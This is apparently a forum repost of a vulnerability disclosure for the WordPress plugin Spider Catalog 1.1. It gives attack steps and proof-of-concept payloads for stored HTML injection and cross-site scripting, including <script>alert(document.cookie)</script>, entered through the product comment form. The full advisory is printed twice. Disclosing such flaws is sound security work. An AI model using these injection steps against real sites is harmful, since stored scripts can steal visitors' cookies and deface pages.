توییت
[align=LEFT]Wordpress Spider Catalog 1.1 HTML Code Injection and Cross-Site scripting
[/align][align=LEFT]
[php]http://www.web-dorado.com/products/wordpress-catalog.html[/php]
Vulnerable Parameter Name:
[php] ?s_p_c_t={Random id}&product_id={Random id}&view=showproduct&page_num={Random id}&back={Random id}[/php]
The error occurs when sending product reviews "view=showproduct" allowing the attacker
to send code to your liking, not $_POST validate the form this code is stored in the db.
Exploit 1:
HTML Code Injection
1. Select any of the products, click and give details or more
2. Once done this post your code on the form with title "Add your comment here".
An example of html:
[php]<center><marquee><h1>HTML code Injection Tested</h1></marquee></center>[/php]
[php] http://example.com/?s_p_c_t={Random id}&product_id={Random id}&view=showproduct&page_num={Random id}&back={Random id}[/php]
Exploit 2:
Cross-site scripting
1. Select any of the products, click and give details or more
2. Once done this post your code on the form with title "Add your comment here".
An example of possible xss:
[php] <script>alert(document.cookie)</script>
<script>alert("Xss ")</script>[/php]
[php]
http://example.com/?s_p_c_t={Random id}&product_id={Random id}&view=showproduct&page_num={Random id}&back={Random id}
[/php]
[/align][align=LEFT] [/align]
[/align][align=LEFT]
[php]http://www.web-dorado.com/products/wordpress-catalog.html[/php]
Vulnerable Parameter Name:
[php] ?s_p_c_t={Random id}&product_id={Random id}&view=showproduct&page_num={Random id}&back={Random id}[/php]
The error occurs when sending product reviews "view=showproduct" allowing the attacker
to send code to your liking, not $_POST validate the form this code is stored in the db.
Exploit 1:
HTML Code Injection
1. Select any of the products, click and give details or more
2. Once done this post your code on the form with title "Add your comment here".
An example of html:
[php]<center><marquee><h1>HTML code Injection Tested</h1></marquee></center>[/php]
[php] http://example.com/?s_p_c_t={Random id}&product_id={Random id}&view=showproduct&page_num={Random id}&back={Random id}[/php]
Exploit 2:
Cross-site scripting
1. Select any of the products, click and give details or more
2. Once done this post your code on the form with title "Add your comment here".
An example of possible xss:
[php] <script>alert(document.cookie)</script>
<script>alert("Xss ")</script>[/php]
[php]
http://example.com/?s_p_c_t={Random id}&product_id={Random id}&view=showproduct&page_num={Random id}&back={Random id}
[/php]
[/align][align=LEFT] [/align]